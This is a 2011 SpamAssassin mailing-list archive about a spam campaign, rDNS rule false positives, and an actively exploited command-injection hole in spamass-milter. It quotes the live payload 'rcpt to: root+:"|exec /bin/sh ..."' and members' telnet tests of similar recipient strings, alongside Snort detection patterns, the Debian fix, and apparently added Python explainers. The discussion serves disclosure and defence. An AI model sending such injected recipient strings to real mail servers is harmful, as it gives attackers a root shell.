Re: new gappy domain campaign (w/sample)

2011-02-10 Thread Chip M.
mouss wrote:
>with a stock config, and without Bayes, it now yields: 

Hmmm, interesting!

Yes, all the "caught" spam here were due to RBL hits.

Which begs the question, what SpamAssassin tests are hitting for 
the misses vs the kills?

Here's what hit (here), for the first 38 missed spams:
  Test                      Count
FH_HELO_EQ_D_D_D_D            2
FSL_HELO_DEVICE               1
FSL_HELO_NON_FQDN_1           1
HELO_DYNAMIC_HCC              2
HELO_DYNAMIC_IPADDR2          1
HELO_NO_DOMAIN                1
RCVD_IN_BL_SPAMCOP_NET       13
RCVD_IN_BRBL_LASTEXT          2
RCVD_IN_PBL                   2 *
RDNS_DYNAMIC                  3
RDNS_NONE                     1

Here's what hit for the first 26 caught spams:
  Test                      Count
AXB_HELO_HOME_UN              1
DATE_IN_FUTURE_Q_PLUS         1
FH_HELO_EQ_D_D_D_D           12
FSL_HELO_DEVICE               1
FSL_HELO_NON_FQDN_1           8
HELO_DYNAMIC_DHCP             3
HELO_DYNAMIC_IPADDR           9
HELO_DYNAMIC_IPADDR2          5
HELO_DYNAMIC_SPLIT_IP         1
HELO_LH_HOME                  1
HELO_NO_DOMAIN                8
RCVD_IN_BRBL_LASTEXT         22
RCVD_IN_PBL                  25 *
RCVD_IN_PSBL                  1
RCVD_IN_SORBS_DUL             3
RCVD_IN_XBL                   1
RDNS_DYNAMIC                 16
RDNS_NONE                    10

The contrast in PBL hits is interesting.
I wonder if RBLs list more aggressively if the IP is already on PBL?
Just a casual thought/question. :)


>here, it gets BAYES_99 as well. 

Is that based on feeding any of these to your Bayes?

I just checked my latest samples, and they're still identical, 
body-wise, so feeding should be extremely effective.

I forgot to mention that these are hitting a few dictionary 
accounts which only receive spam from our old nemesis, the clever
wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
these to morph, real soon. :\

In the past, that guy's campaigns have had a similarly low hit 
rate on PBL.  I've always wondered how he/they achieve that.
- "Chip"


Re: new gappy domain campaign (w/sample)

2011-02-10 Thread Benny Pedersen
On Wed, 9 Feb 2011 22:09:08 + (UTC), "Chip M." wrote:
> There's an interesting new insecure-boy-drugs campaign that's 
> about 8% of our post-gateway traffic.  It started early today.

If you are a user on LinkedIn then report it to ab...@linkedin.com; just
funny to see it's sent from a LinkedIn server that doesn't DKIM sign it.

Gappy domains are just not going to work, since the recipient is not so
clueless as to type g o o g l e . c o m :=)


Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Michael Scheidell

heads up:

In case you are using spamassassin milter:

active exploits going on.




Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


 Original Message 
Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt












The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it.  Although, if we're not seeing 
this sort of thing pop up on customer's boxes, a manual block in 
scanner2 is sufficient for now, right?


Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


is the snort rule specific enough that you can block the offending ip 
for 5 mins?


(if it's a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this.  I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0&0 2>&0"

data

.

quit


*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-al...@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


02/10-12:00:59  TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300

*| *SECNAP Network Security Corporation


·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/

__  
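The two Snort content matches quoted in the forwarded alert, re-implemented as an added Python example (this is not code from the thread, from Emerging Threats or from Snort): it decodes the |hex| notation, applies depth and nocase the way the rule does, and runs both tests over constructed SMTP client lines so a defender can see which command shapes the signature fires on and which legitimate plus-addressed recipients it leaves alone. Packet boundaries and the rule's other options are assumed away: each line is treated as one TCP payload.

```python
import re

# The two content matches from the ET rule quoted above. Snort applies the
# modifiers that follow a content keyword to that content: "to|3A|" must be
# found case-insensitively within the first 10 payload bytes (depth:10; nocase),
# and '+|3A|\"|7C|' (i.e. +:"|) may appear anywhere in the payload,
# case-sensitively, since it carries no modifiers of its own.
RULE_CONTENTS = [
    # (content spec as written in the rule, depth, nocase)
    ('to|3A|', 10, True),
    ('+|3A|\\"|7C|', None, False),
]


def decode_content(spec):
    """Convert a Snort content string to bytes.

    |XX XX| runs are hex bytes, a backslash escapes the next character
    (the rule uses \" for a literal double quote), everything else is literal.
    """
    out = bytearray()
    i = 0
    while i < len(spec):
        ch = spec[i]
        if ch == '|':
            end = spec.index('|', i + 1)
            out += bytes.fromhex(spec[i + 1:end].replace(' ', ''))
            i = end + 1
        elif ch == '\\':
            out.append(ord(spec[i + 1]))
            i += 2
        else:
            out.append(ord(ch))
            i += 1
    return bytes(out)


def content_matches(payload, spec, depth=None, nocase=False):
    """One Snort content test against a TCP payload; depth counts from byte 0."""
    needle = decode_content(spec)
    haystack = payload if depth is None else payload[:depth]
    if nocase:
        needle, haystack = needle.lower(), haystack.lower()
    return needle in haystack


def rule_matches(payload):
    """True when every content test of the rule succeeds on this payload."""
    return all(content_matches(payload, spec, depth, nocase)
               for spec, depth, nocase in RULE_CONTENTS)


def scan_session(lines):
    """Return the client lines (each treated as one packet payload) that would
    raise the alert. Input is a list of bytes objects."""
    return [line for line in lines if rule_matches(line)]


# Constructed SMTP client lines for a self-check; not captured traffic.
SAMPLE_CLIENT_LINES = [
    b'EHLO client.example.test\r\n',
    b'MAIL FROM:<sender@example.test>\r\n',
    b'RCPT TO:<user+tag@example.test>\r\n',      # legitimate plus-address
    b'rcpt to: root+:"|touch /tmp/foo"\r\n',    # shape from the thread
    # the address form that Postfix accepts in Mark's and JKL's tests
    b'RCPT TO:<root+:"|touch /tmp/foo"@example.test>\r\n',
]

if __name__ == '__main__':
    for line in scan_session(SAMPLE_CLIENT_LINES):
        print('ALERT:', line)
```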

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread David F. Skoll
On Thu, 10 Feb 2011 12:42:40 -0500
Michael Scheidell  wrote:

> heads up:

Aieee popen() in security-sensitive software!??!??

Also, why does the milter process run as root?  That seems like a huge
hole all by itself.

Regards,

David.


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> if case you are using spamassassin milter:
>> 
>> active exploits going on.
>> 
>> 
>> 
>> 
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>> 
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee popen() in security-sensitive software!??!??
> 
> Also, why does the milter process run as root?  That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Mark Martinec
On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> Does this affect sendmail as well as postfix?  I assume so,
> but wanted an explicit confirmation.

Yes, the security hole is entirely within the milter,
independent of the MTA.

  Mark


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Jason Haar
On 02/11/2011 09:37 AM, Mark Martinec wrote:
> Yes, the security hole is entirely within the milter,
> independent of the MTA.
>
That exploit is dated Mar 2010? Has this really not been fixed in about
a year???

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1



Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread David F. Skoll
On Fri, 11 Feb 2011 09:50:05 +1300
Jason Haar  wrote:

> That exploit is dated Mar 2010? Has this really not been fixed in
> about a year???

If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
it looks like the last release was in 2006.  It looks like that project
is abandoned.

Regards,

David.


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread David F. Skoll
Sorry to follow up on myself...

> If everyone is talking about
> http://savannah.nongnu.org/projects/spamass-milt/, it looks like the
> last release was in 2006.  It looks like that project is abandoned.

I cannot edit the wiki, but I think spamass-milt should be removed from
http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
unsafe.  There are several other milters available; people shouldn't
be using spamass-milt.

Regards,

David.


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Patrick Ben Koetter
* Mark Martinec :
> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> > Does this affect sendmail as well as postfix?  I assume so,
> > but wanted an explicit confirmation.
> 
> Yes, the security hole is entirely within the milter,
> independent of the MTA.

I tried the exploit and it seems that Postfix' restrictions that check for FQDN
address and correct recipient syntax prevent the exploit from getting through:

telnet mail.example.de 25
220 mail.example.de ESMTP Postfix
HELO foo
250 mail.example.de
MAIL FROM:<>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:
504 5.5.2 : Recipient address rejected: need 
fully-qualified address
RCPT TO:
501 5.1.3 Bad recipient address syntax
QUIT
221 2.0.0 Bye

Can anyone confirm this?

p@rick


-- 
state of mind
Digitale Kommunikation

http://www.state-of-mind.de

Franziskanerstraße 15  Telefon +49 89 3090 4664
81669 München  Telefax +49 89 3090 4666

Amtsgericht MünchenPartnerschaftsregister PR 563



Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Karsten Bräckelmann
On Thu, 2011-02-10 at 16:04 -0500, David F. Skoll wrote:
> I cannot edit the wiki,

I'd be happy to change that. :)

Please just drop me your wiki user name. Same goes for everyone else who
wants to edit the wiki. We've been forced to put ACLs in place as a
counter measure to vandalism and abuse for spam.


> [...] but I think spamass-milt should be removed from
> http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
> unsafe.  There are several other milters available; people shouldn't
> be using spamass-milt.

-- 
char *t="\10pse\0r\0dtu\0.@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4";
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;i>=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}



Re: new gappy domain campaign (w/sample)

2011-02-10 Thread mouss
Le 10/02/2011 10:09, Chip M. a écrit :
> mouss wrote:
>> with a stock config, and without Bayes, it now yields: 
> 
> Hmmm, interesting!
> 
> Yes, all the "caught" spam here were due to RBL hits.
> 
> Which begs the question, what SpamAssassin tests are hitting for 
> the misses vs the kills?
> 
> Here's what hit (here), for the first 38 missed spams:
>   Test                      Count
> FH_HELO_EQ_D_D_D_D            2
> FSL_HELO_DEVICE               1
> FSL_HELO_NON_FQDN_1           1
> HELO_DYNAMIC_HCC              2
> HELO_DYNAMIC_IPADDR2          1
> HELO_NO_DOMAIN                1
> RCVD_IN_BL_SPAMCOP_NET       13
> RCVD_IN_BRBL_LASTEXT          2
> RCVD_IN_PBL                   2 *
> RDNS_DYNAMIC                  3
> RDNS_NONE                     1
> 
> Here's what hit for the first 26 caught spams:
>   Test                      Count
> AXB_HELO_HOME_UN              1
> DATE_IN_FUTURE_Q_PLUS         1
> FH_HELO_EQ_D_D_D_D           12
> FSL_HELO_DEVICE               1
> FSL_HELO_NON_FQDN_1           8
> HELO_DYNAMIC_DHCP             3
> HELO_DYNAMIC_IPADDR           9
> HELO_DYNAMIC_IPADDR2          5
> HELO_DYNAMIC_SPLIT_IP         1
> HELO_LH_HOME                  1
> HELO_NO_DOMAIN                8
> RCVD_IN_BRBL_LASTEXT         22
> RCVD_IN_PBL                  25 *
> RCVD_IN_PSBL                  1
> RCVD_IN_SORBS_DUL             3
> RCVD_IN_XBL                   1
> RDNS_DYNAMIC                 16
> RDNS_NONE                    10
> 
> The contrast in PBL hits is interesting.
> I wonder if RBLs list more aggressively if the IP is already on PBL?
> Just a casual thought/question. :)
> 
> 
>> here, it gets BAYES_99 as well. 
> 
> Is that based on feeding any of these to your Bayes?
> 

No. It's from feeding unrelated spam (I didn't even notice the campaign!).
That said, I have some accounts that are only used for specific purposes
(for example, the account I'm using now is only used for mailing list
mail, and since such mail is automatically moved to folders, what stays
in "inbox" is mostly spam - except for users who reply offlist but
ignore the reply-to header).

> I just checked my latest samples, and they're still identical, 
> body-wise, so feeding should be extremely effective.
> 
> I forgot to mention that these are hitting a few dictionary 
> accounts which only receive spam from our old nemesis, the clever
> wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
> these to morph, real soon. :\
> 
> In the past, that guy's campaigns have had a similarly low hit 
> rate on PBL.  I've always wondered how he/they achieve that.

"they" may check candidate IPs against PBL before sending spam. This is
why I think "generic dns" rules are a good thing, because they cover a
lot more than pbl. (unfortunately, they also hit legit people who don't
take the effort to get whitelisted...)


Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread JKL
Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:&0 2>&0">
250 2.1.5 Ok
data
354 End data with .
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
rcpt to:&0 2>&0">
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
rcpt to:&0 2>&0">
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.





On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> if case you are using spamassassin milter:
>
> active exploits going on.
>
> 
> 
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread David B Funk
On Fri, 11 Feb 2011, Jason Haar wrote:

> On 02/11/2011 09:37 AM, Mark Martinec wrote:
> > Yes, the security hole is entirely within the milter,
> > independent of the MTA.
> >
> That exploit is dated Mar 2010? Has this really not been fixed in about
> a year???
>
>

"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


-- 
Dave Funk  University of Iowa
College of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include 
Better is not better, 'standard' is better. B{


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread John Hardin

On Thu, 10 Feb 2011, David B Funk wrote:

> On Fri, 11 Feb 2011, Jason Haar wrote:
>
>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>
>>> Yes, the security hole is entirely within the milter,
>>> independent of the MTA.
>>
>> That exploit is dated Mar 2010? Has this really not been fixed in about
>> a year???
>
> "a year"??, try half-a-decade. I've got a copy of that code from March
> 2006 and the vulnerability is there. Rather stale project. ;)


heh.

I suppose we ought to compose a boilerplate response for the inevitable 
visitors who will show up asking about this "exploit in SpamAssassin"...


--
 John Hardin KA7OHZhttp://www.impsec.org/~jhardin/
 jhar...@impsec.orgFALaholic #11174 pgpk -a jhar...@impsec.org
 key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
---
  Any time law enforcement becomes a revenue center, the system
  becomes corrupt.
---
 2 days until Abraham Lincoln's and Charles Darwin's 202nd Birthdays


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Mark Martinec
On Thursday February 10 2011 22:26:37 Patrick Ben Koetter wrote:
> I tried the exploit and it seems that Postfix' restrictions that check for
> FQDN address and correct recipient syntax prevent the exploit from getting
> through:

> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:
> 504 5.5.2 : Recipient address rejected: need
> fully-qualified address
> RCPT TO:
> 501 5.1.3 Bad recipient address syntax

> Can anyone confirm this?

rcpt to:
250 2.1.5 Ok


  Mark


Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Warren Togami Jr.

On 2/10/2011 1:29 PM, John Hardin wrote:

> On Thu, 10 Feb 2011, David B Funk wrote:
>
>> On Fri, 11 Feb 2011, Jason Haar wrote:
>>
>>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>>
>>>> Yes, the security hole is entirely within the milter,
>>>> independent of the MTA.
>>>
>>> That exploit is dated Mar 2010? Has this really not been fixed in about
>>> a year???
>>
>> "a year"??, try half-a-decade. I've got a copy of that code from March
>> 2006 and the vulnerability is there. Rather stale project. ;)
>
> heh.
>
> I suppose we ought to compose a boilerplate response for the inevitable
> visitors who will show up asking about this "exploit in SpamAssassin"...



Perhaps more than boilerplate, but rather an official advisory to clear 
up the confusion?  Given that upstream of that milter is dead, nobody 
else will make an official advisory?


Warren


FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
On 02/10/2011 09:42 AM, Michael Scheidell wrote:
> active exploits going on.
> 
> 
> 
> 
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
> 
> I don't see anything on bugtraq about a fix.

The fix (to use popenenv in place of popen) has been noted on the
spamass-milter list.  It was released downstream by both Red Hat and
Debian in March 2010:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228

I've attached the current diff from Debian (note it includes everything,
including the debian/ subdirectory, rather than just that one issue).


... Why is Amavis here for the ride?  They don't use spamass-milter!


spamass-milter_0.3.1-10.diff.gz
Description: GNU Zip compressed data




mx1.res.cisco.com a dynamic ip?

2011-02-10 Thread Michael Scheidell

host mx1.res.cisco.com
mx1.res.cisco.com has address 208.90.57.13
$ host 208.90.57.13
13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.


looks fine to me, why does this look to SA like a dynamic ip?

(TRIGGERED RDNS_DYNAMIC.)

what, because of 'res' in it?  yes, they SHOUTED AT THE RECIPIENT, AND I 
EXPLAINED DON'T DO THAT IN SUBJECT LINE, it's rude.


sorry, sender, receiver are all confidential, but here is a debug:  
(network and bayes tests pushed it past 5.0)


__ANY_TEXT_ATTACH,__ANY_TEXT_ATTACH_DOC,__CT,__CTYPE_HAS_BOUNDARY,
__CTYPE_MULTIPART,__CTYPE_MULTIPART_ANY,__DKIM_DEPENDABLE,__DOS_HAS_ANY_URI,
__DOS_LINK,__DOS_RCVD_THU,__DOS_RELAYED_EXT,__ENV_AND_HDR_FROM_MATCH,__FORGED_RCVD_TRAIL,
__HAS_ANY_EMAIL,__HAS_ANY_URI,__HAS_DATE,__HAS_MESSAGE_ID,__HAS_MSGID,__HAS_RCVD,__HAS_SUBJECT,
__LAST_EXTERNAL_RELAY_NO_AUTH,__LAST_UNTRUSTED_RELAY_NO_AUTH,__LOCAL_PP_NONPPURL,__MANY_RECIPS
,__MIME_ATTACHMENT,__MIME_BASE64,__MIME_CTYPE_TEXT,__MIME_HTML,__MIME_VERSION,__MISSING_REF,__MISSING_REPLY
__MSGID_JAVAMAIL,__MSGID_OK_DIGITS,__NONEMPTY_BODY,__NO_REAL_NAME,__PART_STOCK_CD_F,
*__RCD_RDNS_MX_MESSY,__RDNS_INDICATOR_RES,*__SANE_MSGID,
__SENDER_BOT,__SUBSCRIPTION_INFO,__TAG_EXISTS_BODY,__TAG_EXISTS_HEAD,
__TAG_EXISTS_HTML,__TAG_EXISTS_META,__TOCC_EXISTS,__TO_EQ_FROM_DOM,
__TO_EQ_FROM_DOM_1,__TO_NO_ARROWS_R,__TVD_MIME_ATT_TP
Content analysis details:   (3.0 points, 5.0 required)

 pts rule name              description
---- ---------------------- --------------------------------------------------

 0.0 RELAY_COUNTRY_US   Relayed through United States
 1.6 SUBJ_ALL_CAPS  Subject is all capitals
 0.0 HTML_MESSAGE   BODY: HTML included in message
 0.4 RDNS_DYNAMIC   Delivered to internal network by host with
dynamic-looking rDNS
 1.0 NO_REAL_NAME   NO_REAL_NAME




Re: FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Mark Martinec
Adam Katz wrote:
> ... Why is Amavis here for the ride?  They don't use spamass-milter!

Unrelated. Just Michael being "at home" on both mailing lists.

  Mark


Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt (fwd)

2011-02-10 Thread Andrew Daviel


On Thu, 10 Feb 2011, Michael Scheidell wrote:

> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.


The securityfocus page lists some Debian fixes. The Debian patch 
spamass-milter_0.3.1-8+lenny2.diff.gz changelog includes:

+spamass-milter (0.3.1-8+lenny1) stable-security; urgency=high
+
+  * Use new popenenv function instead of open; fixes remote code exploit
+as the spamass-milter user when run using -x. (closes: #573228)
+
+ -- Don Armstrong   Wed, 17 Mar 2010 12:52:56 -0700
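Review bot: "instead of open" in the changelog entry reads as a typo for popen; the fix discussed elsewhere in this thread replaces popen() with popenenv(), so the entry should say "instead of popen". The scope statement that follows (code runs as the spamass-milter user, only when run using -x) is the part an administrator needs to triage exposure and should stay as written.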

per http://security.debian.org/pool/updates/main/s/spamass-milter/

--
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376  (Pacific Time)
Network Security Manager


Re: mx1.res.cisco.com a dynamic ip?

2011-02-10 Thread Warren Togami Jr.

On 2/10/2011 2:30 PM, Michael Scheidell wrote:

> host mx1.res.cisco.com
> mx1.res.cisco.com has address 208.90.57.13
> $ host 208.90.57.13
> 13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.
>
> looks fine to me, why does this look to SA like a dynamic ip?
>
> (TRIGGERED RDNS_DYNAMIC.)
>
> what, because of 'res' in it? yes, they SHOUTED AT THE RECIPIENT, AND I
> EXPLAINED DON'T DO THAT IN SUBJECT LINE, its rude.



The RDNS_DYNAMIC rule might be better to be replaced by the more precise 
S25R-based patterns in KHOP_DYNAMIC.  Care enough?  Please file a bug 
and look into the relative results of the masschecks to start an analysis.


Warren


Re: mx1.res.cisco.com a dynamic ip?

2011-02-10 Thread Sahil Tandon
On Thu, 2011-02-10 at 19:30:15 -0500, Michael Scheidell wrote:

> host mx1.res.cisco.com
> mx1.res.cisco.com has address 208.90.57.13
> $ host 208.90.57.13
> 13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.
> 
> looks fine to me, why does this look to SA like a dynamic ip?
> 
> (TRIGGERED RDNS_DYNAMIC.)

Probably __RDNS_INDICATOR_RES, which is included in the RDNS_DYNAMIC
meta rule definition.

> what, because of 'res' in it?

Apparently... from 20_dynrdns.cf:

# this hits a little ham, not too much though
header __RDNS_INDICATOR_RES   X-Spam-Relays-External =~ /^[^\]]+ rdns=\S+[\-\.](?:res|resnet|client)[\-\.]/i

-- 
Sahil Tandon 
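The __RDNS_INDICATOR_RES pattern above, transcribed into Python as an added example (not SpamAssassin's own code) and run over a constructed X-Spam-Relays-External value, to show why mx1.res.cisco.com fires it, why a hostname merely starting with "res" does not, and that only the most recent external relay is examined. The bracketed key=value layout is assumed from SA's pseudo-header format, with fields other than ip, rdns and helo filled with placeholders.

```python
import re

# The __RDNS_INDICATOR_RES sub-rule from 20_dynrdns.cf, quoted above, as a
# Python regex. SpamAssassin evaluates it with /i against the
# X-Spam-Relays-External pseudo-header; the leading ^[^\]]+ cannot cross a
# "]", so the rule only ever inspects the first "[ ... ]" entry, which is the
# most recent (last external) relay.
RDNS_INDICATOR_RES = re.compile(
    r'^[^\]]+ rdns=\S+[\-\.](?:res|resnet|client)[\-\.]', re.IGNORECASE)


def relays_external(relays):
    """Build a constructed X-Spam-Relays-External value from (ip, rdns) pairs,
    most recent external relay first, in SA's bracketed key=value layout.
    Fields other than ip, rdns and helo are placeholders (assumed layout)."""
    return ' '.join(
        '[ ip=%s rdns=%s helo=%s by=mx.example.test ident= envfrom= intl=0 '
        'id=placeholder auth= msa=0 ]' % (ip, rdns, rdns or 'unknown')
        for ip, rdns in relays)


def indicator_res_hit(relays):
    """Return the rdns fragment that satisfied the rule (up to and including
    the delimiter after res/resnet/client), or None if the rule does not fire."""
    m = RDNS_INDICATOR_RES.search(relays_external(relays))
    return m.group(0).rsplit('rdns=', 1)[1] if m else None


def classify(hostnames):
    """Map constructed single-relay hostnames to whether the rule fires;
    the IP is a documentation-range placeholder, the regex never reads it."""
    return {h: indicator_res_hit([('192.0.2.1', h)]) is not None
            for h in hostnames}


if __name__ == '__main__':
    # mx1.res.cisco.com from the thread, plus constructed comparison hosts
    for host, hit in classify(['mx1.res.cisco.com', 'mx1.cisco.com',
                               'research.example.test',
                               'cpe-1-2-3-4.resnet.example.test']).items():
        print('%-35s %s' % (host, 'hits __RDNS_INDICATOR_RES' if hit else 'ok'))
```

A hostname has to carry res, resnet or client as a whole label-like token bounded by "-" or "." on both sides, which is why the cisco host trips it while a leading "research" does not.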


Re: mx1.res.cisco.com a dynamic ip?

2011-02-10 Thread Karsten Bräckelmann
On Thu, 2011-02-10 at 19:30 -0500, Michael Scheidell wrote:
> host mx1.res.cisco.com
> mx1.res.cisco.com has address 208.90.57.13
> $ host 208.90.57.13
> 13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.
> 
> looks fine to me, why does this look to SA like a dynamic ip?

Kind of... irrelevant. In this context. Or rather, terribly confusing.

In your snippet, RDNS_DYNAMIC accounts for a score of 0.4 (score-set 1),
but you said that network tests and Bayes pushed it above the threshold.
That would be score-set 4, and this one rule scoring just shy of 1.0.

So, what are the real rules hit, the real scores? What weight did the
network rules and Bayes have? More than that 1.0? Which rule really
caused the FP here?


> sorry, sender, receiver are all confidential, but here is a debug:  
> (network and bayes tests pushed it past 5.0)

> Content analysis details:   (3.0 points, 5.0 required)

>   0.0 RELAY_COUNTRY_US   Relayed through United States
>   1.6 SUBJ_ALL_CAPS  Subject is all capitals
>   0.0 HTML_MESSAGE   BODY: HTML included in message
>   0.4 RDNS_DYNAMIC   Delivered to internal network by host with
>  dynamic-looking rDNS
>   1.0 NO_REAL_NAME   NO_REAL_NAME
